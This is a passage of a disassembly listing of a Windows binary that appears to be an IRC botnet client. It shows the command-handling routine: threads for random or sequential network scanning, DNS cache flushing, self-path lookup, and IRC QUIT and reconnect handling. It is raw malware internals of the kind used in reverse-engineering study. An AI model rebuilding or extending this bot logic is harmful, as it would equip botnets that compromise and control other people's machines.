imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_4037D6
loc_4037C0: ; CODE XREF: sub_401ACD+1D07�j
cmp [ebp+var_EC8], ebx
jnz loc_4083BD
push 32h
call dword_427078 ; Sleep
jmp short loc_4037C0
; ---------------------------------------------------------------------------
loc_4037D6: ; CODE XREF: sub_401ACD+1CF1�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42C6E4
jmp loc_4083AE
; ---------------------------------------------------------------------------
loc_4037E7: ; CODE XREF: sub_401ACD+1BF6�j
; sub_401ACD+1C0B�j
mov al, byte_431CE2
mov [ebp+arg_0], ebx
cmp al, bl
mov edx, offset byte_431CE2
jz loc_401E94
mov ecx, edx
loc_4037FE: ; CODE XREF: sub_401ACD+1D39�j
inc [ebp+arg_0]
add ecx, 0Bh
cmp [ecx], bl
jnz short loc_4037FE
cmp al, bl
jz loc_401E94
mov [ebp+arg_18], edx
mov esi, offset aF ; "#f"
loc_403818: ; CODE XREF: sub_401ACD+2009�j
push 0Bh
call sub_40B33F
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+arg_0]
add eax, ecx
cmp eax, 1F4h
jle short loc_403867
push ecx
lea eax, [ebp+var_2C4]
push offset unk_42C6A4
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add esp, 20h
jmp loc_403ACD
; ---------------------------------------------------------------------------
loc_403867: ; CODE XREF: sub_401ACD+1D65�j
or [ebp+var_730], 0FFFFFFFFh
cmp dword_431B00, ebx
mov [ebp+var_734], 64h
mov [ebp+var_748], 5
mov [ebp+var_744], 320h
mov [ebp+arg_0], ebx
jz short loc_4038D8
mov edi, offset dword_431B00
loc_40389C: ; CODE XREF: sub_401ACD+1DED�j
mov eax, [ebp+arg_18]
add eax, 0FFFFFFF6h
push eax
lea eax, [edi-28h]
push eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_4038BE
inc [ebp+arg_0]
add edi, 40h
cmp [edi], ebx
jnz short loc_40389C
jmp short loc_4038D8
; ---------------------------------------------------------------------------
loc_4038BE: ; CODE XREF: sub_401ACD+1DE3�j
mov eax, [ebp+arg_0]
mov ecx, eax
mov [ebp+var_730], eax
shl ecx, 6
mov ecx, dword_431B00[ecx]
mov [ebp+var_74C], ecx
loc_4038D8: ; CODE XREF: sub_401ACD+1DC8�j
; sub_401ACD+1DEF�j
cmp [ebp+var_74C], ebx
jz loc_403AE1
push 10h
lea eax, [ebp+var_2D4]
pop edi
push eax
lea eax, [ebp+var_30C]
push eax
mov [ebp+var_2D4], edi
push [ebp+arg_4]
call ds:dword_4CB5F8 ; getsockname
mov al, [ebp+var_8FF]
push edi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_308], eax
push [ebp+var_308]
call ds:dword_4CB6E0 ; inet_ntoa
push eax
lea eax, [ebp+var_860]
push eax
call sub_41B5F0
xor eax, eax
cmp [ebp+var_8FF], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_860]
push eax
call sub_41BE40
add esp, 14h
cmp edi, ebx
mov byte ptr [ebp+arg_24+3], bl
jle short loc_403980
loc_40395E: ; CODE XREF: sub_401ACD+1EB1�j
cmp eax, ebx
jz short loc_403980
mov byte ptr [eax], 78h
lea eax, [ebp+var_860]
push 30h
push eax
call sub_41BE40
inc byte ptr [ebp+arg_24+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_24+3]
cmp ecx, edi
jl short loc_40395E
loc_403980: ; CODE XREF: sub_401ACD+1E8F�j
; sub_401ACD+1E93�j
mov eax, [ebp+arg_4]
push [ebp+var_88]
mov [ebp+var_750], eax
mov eax, [ebp+var_4]
mov [ebp+var_728], eax
mov eax, [ebp+var_8]
mov [ebp+var_724], eax
mov edi, 80h
lea eax, [ebp+var_850]
push edi
push eax
mov [ebp+var_720], 1
call sub_41B980
push offset byte_43D808
push esi
call sub_41C070
add esp, 14h
test eax, eax
jz short loc_4039E2
push esi
lea eax, [ebp+var_7D0]
push edi
push eax
call sub_41B980
add esp, 0Ch
jmp short loc_4039E8
; ---------------------------------------------------------------------------
loc_4039E2: ; CODE XREF: sub_401ACD+1F00�j
mov [ebp+var_7D0], bl
loc_4039E8: ; CODE XREF: sub_401ACD+1F13�j
cmp [ebp+var_720], ebx
mov eax, offset aRandom ; "Random"
jnz short loc_4039FA
mov eax, offset aSequential ; "Sequential"
loc_4039FA: ; CODE XREF: sub_401ACD+1F26�j
push [ebp+var_734]
lea ecx, [ebp+var_860]
push [ebp+var_744]
push [ebp+var_748]
push [ebp+var_74C]
push ecx
push eax
lea eax, [ebp+var_2C4]
push offset unk_42C624
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 0Bh
push eax
call sub_40B0F7
add esp, 2Ch
mov [ebp+var_740], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_860]
push ebx
push eax
push offset sub_40C33D
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_740]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_403A84
loc_403A72: ; CODE XREF: sub_401ACD+1FB5�j
cmp [ebp+var_71C], ebx
jnz short loc_403A9F
push 32h
call dword_427078 ; Sleep
jmp short loc_403A72
; ---------------------------------------------------------------------------
loc_403A84: ; CODE XREF: sub_401ACD+1FA3�j
call dword_42708C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2C4]
push offset unk_42C5E8
push eax
call sub_41B886
add esp, 0Ch
loc_403A9F: ; CODE XREF: sub_401ACD+1FAB�j
cmp [ebp+var_8], ebx
jnz short loc_403AC0
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add esp, 14h
loc_403AC0: ; CODE XREF: sub_401ACD+1FD5�j
lea eax, [ebp+var_2C4]
push eax
call sub_4151AD
pop ecx
loc_403ACD: ; CODE XREF: sub_401ACD+1D95�j
add [ebp+arg_18], 0Bh
mov eax, [ebp+arg_18]
cmp [eax], bl
jnz loc_403818
jmp loc_401E94
; ---------------------------------------------------------------------------
loc_403AE1: ; CODE XREF: sub_401ACD+1E11�j
push offset unk_42C5B0
jmp loc_406F05
; ---------------------------------------------------------------------------
loc_403AEB: ; CODE XREF: sub_401ACD+1B66�j
; sub_401ACD+1B7B�j
push 5
call sub_40B33F
test eax, eax
pop ecx
jle short loc_403B01
push offset unk_42C590
jmp loc_406F05
; ---------------------------------------------------------------------------
loc_403B01: ; CODE XREF: sub_401ACD+2028�j
mov eax, [ebp+esi+var_8C]
cmp eax, ebx
jz short loc_403B24
push eax
mov edi, 104h
lea eax, [ebp+var_2D50]
push edi
push eax
call sub_41B980
add esp, 0Ch
jmp short loc_403B38
; ---------------------------------------------------------------------------
loc_403B24: ; CODE XREF: sub_401ACD+203D�j
mov edi, 104h
lea eax, [ebp+var_2D50]
push edi
push eax
push ebx
call dword_427070 ; GetModuleFileNameA
loc_403B38: ; CODE XREF: sub_401ACD+2055�j
mov esi, [ebp+esi+var_88]
cmp esi, ebx
jnz short loc_403B48
mov esi, offset byte_429110
loc_403B48: ; CODE XREF: sub_401ACD+2074�j
push esi
lea eax, [ebp+var_2C4C]
push edi
push eax
call sub_41B980
mov eax, dword_429078
push 7Fh
push [ebp+var_88]
mov [ebp+var_2B40], eax
mov eax, [ebp+arg_4]
mov [ebp+var_2B44], ebx
mov [ebp+var_2D54], eax
lea eax, [ebp+var_2B3C]
push eax
call sub_41B5F0
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_2ABC], eax
mov eax, [ebp+var_8]
mov [ebp+var_2AB8], eax
lea eax, [ebp+var_2D50]
push eax
lea eax, [ebp+var_2C4]
push [ebp+var_2B40]
push offset unk_42C55C
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 5
push eax
call sub_40B0F7
add esp, 1Ch
mov [ebp+var_2B48], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2D54]
push ebx
push eax
push offset sub_411797
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_2B48]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_403C14
loc_403BFE: ; CODE XREF: sub_401ACD+2145�j
cmp [ebp+var_2AB4], ebx
jnz loc_40828C
push 32h
call dword_427078 ; Sleep
jmp short loc_403BFE
; ---------------------------------------------------------------------------
loc_403C14: ; CODE XREF: sub_401ACD+212F�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42C520
jmp loc_4049EC
; ---------------------------------------------------------------------------
loc_403C25: ; CODE XREF: sub_401ACD+1B3C�j
; sub_401ACD+1B51�j
mov edi, [ebp+esi+var_8C]
cmp edi, ebx
jz short loc_403C44
push edi
call sub_41B779
test eax, eax
pop ecx
jz short loc_403C44
push edi
call sub_41B779
pop ecx
jmp short loc_403C49
; ---------------------------------------------------------------------------
loc_403C44: ; CODE XREF: sub_401ACD+2161�j
; sub_401ACD+216C�j
mov eax, dword_42907C
loc_403C49: ; CODE XREF: sub_401ACD+2175�j
mov esi, [ebp+esi+var_88]
mov [ebp+var_36C8], eax
xor eax, eax
cmp [ebp+var_8FC], bl
setz al
cmp esi, ebx
mov [ebp+var_36B4], eax
jz short loc_403C7C
lea eax, [ebp+var_37CC]
push esi
push eax
call sub_41B886
pop ecx
pop ecx
jmp short loc_403CA7
; ---------------------------------------------------------------------------
loc_403C7C: ; CODE XREF: sub_401ACD+219C�j
lea eax, [ebp+var_4FF4]
push 104h
push eax
call dword_427074 ; GetSystemDirectoryA
push ebx
push ebx
lea eax, [ebp+var_4C8]
push ebx
push eax
lea eax, [ebp+var_4FF4]
push eax
call sub_41B9D1
add esp, 14h
loc_403CA7: ; CODE XREF: sub_401ACD+21AD�j
lea eax, [ebp+var_37CC]
push eax
call sub_41AFE0
cmp [ebp+eax+var_37CD], 5Ch
pop ecx
jnz short loc_403CD2
lea eax, [ebp+var_37CC]
push eax
call sub_41AFE0
pop ecx
mov [ebp+eax+var_37CD], bl
loc_403CD2: ; CODE XREF: sub_401ACD+21EF�j
push [ebp+var_88]
mov esi, [ebp+arg_4]
lea eax, [ebp+var_3A54]
mov [ebp+var_3A58], esi
push 80h
push eax
call sub_41B980
mov eax, [ebp+var_8]
mov edi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_36B8], eax
lea eax, [ebp+var_37CC]
mov [ebp+var_36BC], edi
push eax
push [ebp+var_36C8]
push esi
call sub_40AC10
pop ecx
push eax
lea eax, [ebp+var_2C4]
push offset unk_42C4E4
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 3
push eax
call sub_40B0F7
add esp, 20h
mov [ebp+var_36C0], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3A58]
push ebx
push eax
push offset sub_40F0D6
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_36C0]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_403D86
loc_403D74: ; CODE XREF: sub_401ACD+22B7�j
cmp [ebp+var_36AC], ebx
jnz short loc_403DA1
push 32h
call dword_427078 ; Sleep
jmp short loc_403D74
; ---------------------------------------------------------------------------
loc_403D86: ; CODE XREF: sub_401ACD+22A5�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42C4A8
loc_403D92: ; CODE XREF: sub_401ACD+241A�j
; sub_401ACD+4D05�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_41B886
add esp, 0Ch
loc_403DA1: ; CODE XREF: sub_401ACD+22AD�j
; sub_401ACD+23FE�j ...
cmp [ebp+var_8], ebx
jnz loc_4083BD
push ebx
push edi
jmp loc_407286
; ---------------------------------------------------------------------------
loc_403DB1: ; CODE XREF: sub_401ACD+1B12�j
; sub_401ACD+1B27�j
mov edi, [ebp+esi+var_8C]
cmp edi, ebx
jz short loc_403DD0
push edi
call sub_41B779
test eax, eax
pop ecx
jz short loc_403DD0
push edi
call sub_41B779
pop ecx
jmp short loc_403DD5
; ---------------------------------------------------------------------------
loc_403DD0: ; CODE XREF: sub_401ACD+22ED�j
; sub_401ACD+22F8�j
mov eax, dword_429080
loc_403DD5: ; CODE XREF: sub_401ACD+2301�j
mov [ebp+var_1824], eax
mov eax, [ebp+esi+var_88]
cmp eax, ebx
jnz short loc_403DEC
lea eax, [ebp+var_C4]
loc_403DEC: ; CODE XREF: sub_401ACD+2317�j
push eax
lea eax, [ebp+var_1964]
push 40h
push eax
call sub_41B980
mov esi, [ebp+esi+var_84]
add esp, 0Ch
cmp esi, ebx
jnz short loc_403E0E
mov esi, offset byte_43D808
loc_403E0E: ; CODE XREF: sub_401ACD+233A�j
push esi
lea eax, [ebp+var_1924]
push 100h
push eax
call sub_41B980
add esp, 0Ch
lea eax, [ebp+var_19E4]
push [ebp+var_88]
push 80h
push eax
call sub_41B980
mov eax, [ebp+var_8]
mov esi, [ebp+arg_4]
mov edi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_1810], eax
lea eax, [ebp+var_1964]
push eax
mov [ebp+var_19E8], esi
push [ebp+var_1824]
mov [ebp+var_1814], edi
push esi
call sub_40AC10
pop ecx
push eax
lea eax, [ebp+var_2C4]
push offset unk_42C46C
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 9
push eax
call sub_40B0F7
add esp, 20h
mov [ebp+var_1820], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_19E8]
push ebx
push eax
push offset sub_410A4E
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_1820]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_403EDB
loc_403EC5: ; CODE XREF: sub_401ACD+240C�j
cmp [ebp+var_180C], ebx
jnz loc_403DA1
push 32h
call dword_427078 ; Sleep
jmp short loc_403EC5
; ---------------------------------------------------------------------------
loc_403EDB: ; CODE XREF: sub_401ACD+23F6�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42C430
jmp loc_403D92
; ---------------------------------------------------------------------------
loc_403EEC: ; CODE XREF: sub_401ACD+1AE8�j
; sub_401ACD+1AFD�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz short loc_403EFF
push esi
call sub_41B779
jmp short loc_403F06
; ---------------------------------------------------------------------------
loc_403EFF: ; CODE XREF: sub_401ACD+2428�j
push 0Bh
call sub_40B35E
loc_403F06: ; CODE XREF: sub_401ACD+2430�j
cmp eax, ebx
pop ecx
jz loc_409855
push eax
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_40BA57
jmp loc_4043BA
; ---------------------------------------------------------------------------
loc_403F26: ; CODE XREF: sub_401ACD+1ABE�j
; sub_401ACD+1AD3�j
mov eax, ds:dword_4CB570
cmp eax, ebx
jz short loc_403F43
call eax ; DnsFlushResolverCache
test eax, eax
jz short loc_403F3C
push offset unk_42C40C
jmp short loc_403F48
; ---------------------------------------------------------------------------
loc_403F3C: ; CODE XREF: sub_401ACD+2466�j
push offset unk_42C3E0
jmp short loc_403F48
; ---------------------------------------------------------------------------
loc_403F43: ; CODE XREF: sub_401ACD+2460�j
push offset unk_42C3B4
loc_403F48: ; CODE XREF: sub_401ACD+246D�j
; sub_401ACD+2474�j ...
lea eax, [ebp+var_2C4]
push 200h
push eax
call sub_41B980
jmp loc_406CDC
; ---------------------------------------------------------------------------
loc_403F5E: ; CODE XREF: sub_401ACD+1A94�j
; sub_401ACD+1AA9�j
call sub_40AB32
test eax, eax
jz short loc_403F6E
push offset unk_42C390
jmp short loc_403F48
; ---------------------------------------------------------------------------
loc_403F6E: ; CODE XREF: sub_401ACD+2498�j
push offset unk_42C364
jmp short loc_403F48
; ---------------------------------------------------------------------------
loc_403F75: ; CODE XREF: sub_401ACD+1A6A�j
; sub_401ACD+1A7F�j
cmp [ebp+var_8], ebx
jnz short loc_403F94
push ebx
push [ebp+var_4]
push offset dword_42C34C
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add esp, 14h
loc_403F94: ; CODE XREF: sub_401ACD+24AB�j
push ebx
push [ebp+var_4]
call sub_4181D7
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
push offset dword_42C330
jmp loc_404286
; ---------------------------------------------------------------------------
loc_403FB6: ; CODE XREF: sub_401ACD+18FA�j
; sub_401ACD+190F�j
push 0Ah
call sub_40B33F
test eax, eax
pop ecx
jle short loc_403FCC
push offset unk_42C304
jmp loc_409602
; ---------------------------------------------------------------------------
loc_403FCC: ; CODE XREF: sub_401ACD+24F3�j
push [ebp+var_88]
push [ebp+arg_4]
call sub_419C65
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_403FEB
push offset unk_42C2DC
jmp loc_409602
; ---------------------------------------------------------------------------
loc_403FEB: ; CODE XREF: sub_401ACD+2512�j
push offset unk_42C2BC
jmp loc_409602
; ---------------------------------------------------------------------------
loc_403FF5: ; CODE XREF: sub_401ACD+18D0�j
; sub_401ACD+18E5�j
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_40A7CF
jmp loc_401E91
; ---------------------------------------------------------------------------
loc_40400E: ; CODE XREF: sub_401ACD+18A6�j
; sub_401ACD+18BB�j
push [ebp+esi+var_8C]
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_416C29
jmp loc_401E91
; ---------------------------------------------------------------------------
loc_40402B: ; CODE XREF: sub_401ACD+187C�j
; sub_401ACD+1891�j
or edi, 0FFFFFFFFh
call dword_4270A8 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
mov [ebp+arg_0], eax
jz short loc_404054
push esi
call sub_41B779
pop ecx
mov edi, eax
loc_404054: ; CODE XREF: sub_401ACD+257C�j
mov eax, [ebp+arg_0]
xor edx, edx
mov ecx, 15180h
div ecx
cmp eax, edi
jnb short loc_40406D
cmp edi, 0FFFFFFFFh
jnz loc_409855
loc_40406D: ; CODE XREF: sub_401ACD+2595�j
push ebx
call sub_41A88C
pop ecx
push eax
lea eax, [ebp+var_2C4]
push offset dword_42C2A4
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
lea eax, [ebp+var_2C4]
push eax
call sub_4151AD
loc_4040AB: ; CODE XREF: sub_401ACD+529D�j
add esp, 24h
jmp loc_409855
; ---------------------------------------------------------------------------
loc_4040B3: ; CODE XREF: sub_401ACD+1852�j
; sub_401ACD+1867�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_415A30
add esp, 0Ch
push offset dword_42C284
jmp loc_406F05
; ---------------------------------------------------------------------------
loc_4040D1: ; CODE XREF: sub_401ACD+1828�j
; sub_401ACD+183D�j
push 27h
call sub_40B33F
test eax, eax
pop ecx
jle short loc_404105
cmp [ebp+var_8], ebx
jnz loc_401E94
push ebx
push [ebp+var_4]
push offset unk_42C264
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
loc_4040FD: ; CODE XREF: sub_401ACD+7238�j
add esp, 14h
jmp loc_401E94
; ---------------------------------------------------------------------------
loc_404105: ; CODE XREF: sub_401ACD+260E�j
push [ebp+var_88]
lea eax, [ebp+var_B2C]
push 80h
push eax
call sub_41B980
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_8C]
mov [ebp+var_B30], eax
mov eax, [ebp+var_4]
mov [ebp+var_AA4], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_AA0], eax
mov [ebp+var_AA8], ebx
jz short loc_404166
push esi
push offset aFull ; "full"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_404166
mov [ebp+var_AA8], 1
loc_404166: ; CODE XREF: sub_401ACD+267C�j
; sub_401ACD+268D�j
lea eax, [ebp+var_2C4]
push offset dword_42C240
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 27h
push eax
call sub_40B0F7
add esp, 14h
mov [ebp+var_AAC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_B30]
push ebx
push eax
push offset sub_4198EC
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_AAC]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_4041D4
loc_4041BE: ; CODE XREF: sub_401ACD+2705�j
cmp [ebp+var_A9C], ebx
jnz loc_409631
push 32h
call dword_427078 ; Sleep
jmp short loc_4041BE
; ---------------------------------------------------------------------------
loc_4041D4: ; CODE XREF: sub_401ACD+26EF�j
call dword_42708C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2C4]
push offset unk_42C204
push eax
call sub_41B886
add esp, 0Ch
jmp loc_409631
; ---------------------------------------------------------------------------
loc_4041F4: ; CODE XREF: sub_401ACD+17FE�j
; sub_401ACD+1813�j
cmp [ebp+var_8], ebx
jnz short loc_404213
push ebx
push [ebp+var_4]
push offset dword_42C1E8
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add esp, 14h
loc_404213: ; CODE XREF: sub_401ACD+272A�j
push [ebp+arg_4]
call ds:dword_4CB6EC ; closesocket
call ds:dword_4CB5AC ; WSACleanup
call sub_41835A
push ebx
call dword_427064 ; ExitProcess
loc_40422E: ; CODE XREF: sub_401ACD+17D4�j
; sub_401ACD+17E9�j
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push [ebp+arg_4]
push eax
call sub_41AA43
pop ecx
pop ecx
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
push offset dword_42C1CC
jmp short loc_404286
; ---------------------------------------------------------------------------
loc_404259: ; CODE XREF: sub_401ACD+17AA�j
; sub_401ACD+17BF�j
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_41ACF7
add esp, 0Ch
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
push offset dword_42C1B0
loc_404286: ; CODE XREF: sub_401ACD+24E4�j
; sub_401ACD+278A�j
call sub_4151AD
add esp, 18h
jmp loc_409855
; ---------------------------------------------------------------------------
loc_404293: ; CODE XREF: sub_401ACD+1780�j
; sub_401ACD+1795�j
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_41524D
jmp loc_401E91
; ---------------------------------------------------------------------------
loc_4042AC: ; CODE XREF: sub_401ACD+1756�j
; sub_401ACD+176B�j
cmp [ebp+var_C], ebx
mov [ebp+var_1594], bl
jz short loc_4042EB
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz short loc_4042EB
push esi
push [ebp+var_C]
call sub_41B900
pop ecx
cmp eax, ebx
pop ecx
jz short loc_4042EB
push eax
push offset aS_2 ; "%s"
lea eax, [ebp+var_1594]
push 80h
push eax
call sub_41B980
add esp, 10h
loc_4042EB: ; CODE XREF: sub_401ACD+27E8�j
; sub_401ACD+27F3�j ...
push [ebp+var_88]
lea eax, [ebp+var_1614]
push 80h
push eax
call sub_41B980
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_1618], eax
mov eax, [ebp+var_4]
mov [ebp+var_1510], eax
mov eax, [ebp+var_8]
mov [ebp+var_150C], eax
lea eax, [ebp+var_2C4]
push offset dword_42C198
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 25h
push eax
call sub_40B0F7
add esp, 14h
mov [ebp+var_1514], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1618]
push ebx
push eax
push offset sub_41528E
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_1514]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_40438E
loc_404378: ; CODE XREF: sub_401ACD+28BF�j
cmp [ebp+var_1508], ebx
jnz loc_401E94
push 32h
call dword_427078 ; Sleep
jmp short loc_404378
; ---------------------------------------------------------------------------
loc_40438E: ; CODE XREF: sub_401ACD+28A9�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42C160
jmp loc_402077
; ---------------------------------------------------------------------------
loc_40439F: ; CODE XREF: sub_401ACD+172C�j
; sub_401ACD+1741�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_415135
push offset dword_42C148
call sub_4151AD
loc_4043BA: ; CODE XREF: sub_401ACD+2454�j
add esp, 10h
jmp loc_409855
; ---------------------------------------------------------------------------
loc_4043C2: ; CODE XREF: sub_401ACD+1702�j
; sub_401ACD+1717�j
push [ebp+var_88]
lea eax, [ebp+var_BC4]
push 80h
push eax
call sub_41B980
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_8C]
mov [ebp+var_BC8], eax
mov eax, [ebp+var_4]
mov [ebp+var_B3C], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_B38], eax
jz short loc_40441C
push offset dword_42C144
push esi
call sub_41C070
neg eax
sbb eax, eax
pop ecx
inc eax
pop ecx
mov [ebp+var_B40], eax
jmp short loc_404422
; ---------------------------------------------------------------------------
loc_40441C: ; CODE XREF: sub_401ACD+2933�j
mov [ebp+var_B40], ebx
loc_404422: ; CODE XREF: sub_401ACD+294D�j
lea eax, [ebp+var_2C4]
push offset dword_42C124
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 28h
push eax
call sub_40B0F7
add esp, 14h
mov [ebp+var_B44], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_BC8]
push ebx
push eax
push offset sub_40B162
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_B44]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_404490
loc_40447A: ; CODE XREF: sub_401ACD+29C1�j
cmp [ebp+var_B34], ebx
jnz loc_406D00
push 32h
call dword_427078 ; Sleep
jmp short loc_40447A
; ---------------------------------------------------------------------------
loc_404490: ; CODE XREF: sub_401ACD+29AB�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42C0E8
jmp loc_409227
; ---------------------------------------------------------------------------
loc_4044A1: ; CODE XREF: sub_401ACD+1686�j
; sub_401ACD+169B�j
push offset aQufpoius ; "qufpoius"
push offset dword_42C0D0
loc_4044AB: ; CODE XREF: sub_401ACD+2A1D�j
lea eax, [ebp+var_2C4]
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add esp, 20h
jmp loc_406D00
; ---------------------------------------------------------------------------
loc_4044D8: ; CODE XREF: sub_401ACD+165C�j
; sub_401ACD+1671�j
push ds:dword_4CB394
call sub_41A88C
pop ecx
push eax
push offset unk_42C0A4
jmp short loc_4044AB
; ---------------------------------------------------------------------------
loc_4044EC: ; CODE XREF: sub_401ACD+1632�j
; sub_401ACD+1647�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz short loc_40451E
cmp [ebp+var_C], ebx
jz short loc_40452D
push esi
push [ebp+var_C]
call sub_41B900
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40452D
push eax
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+arg_4]
call sub_409A2D
add esp, 0Ch
jmp short loc_40452D
; ---------------------------------------------------------------------------
loc_40451E: ; CODE XREF: sub_401ACD+2A28�j
push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+arg_4]
call sub_409A2D
pop ecx
pop ecx
loc_40452D: ; CODE XREF: sub_401ACD+2A2D�j
; sub_401ACD+2A3C�j ...
push 0FFFFFFFEh
jmp loc_401E96
; ---------------------------------------------------------------------------
loc_404534: ; CODE XREF: sub_401ACD+1608�j
; sub_401ACD+161D�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+arg_4]
call sub_409A2D
push offset dword_42C054
call sub_4151AD
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_401E97
; ---------------------------------------------------------------------------
loc_404556: ; CODE XREF: sub_401ACD+15DE�j
; sub_401ACD+15F3�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4]
call sub_409A2D
push offset dword_42C020
call sub_4151AD
add esp, 0Ch
jmp loc_4097BA
; ---------------------------------------------------------------------------
loc_404575: ; CODE XREF: sub_401ACD+15B4�j
; sub_401ACD+15C9�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_40B7DB
jmp loc_404934
; ---------------------------------------------------------------------------
loc_40458B: ; CODE XREF: sub_401ACD+158A�j
; sub_401ACD+159F�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_40B786
jmp loc_404934
; ---------------------------------------------------------------------------
loc_4045A1: ; CODE XREF: sub_401ACD+1560�j
; sub_401ACD+1575�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_40B71A
jmp loc_404934
; ---------------------------------------------------------------------------
loc_4045B7: ; CODE XREF: sub_401ACD+1536�j
; sub_401ACD+154B�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_40B64B
jmp loc_404934
; ---------------------------------------------------------------------------
loc_4045CD: ; CODE XREF: sub_401ACD+1491�j
; sub_401ACD+14A6�j
push [ebp+esi+var_8C]
push 27h
push offset dword_42C010
push offset dword_42C000
jmp loc_402B25
; ---------------------------------------------------------------------------
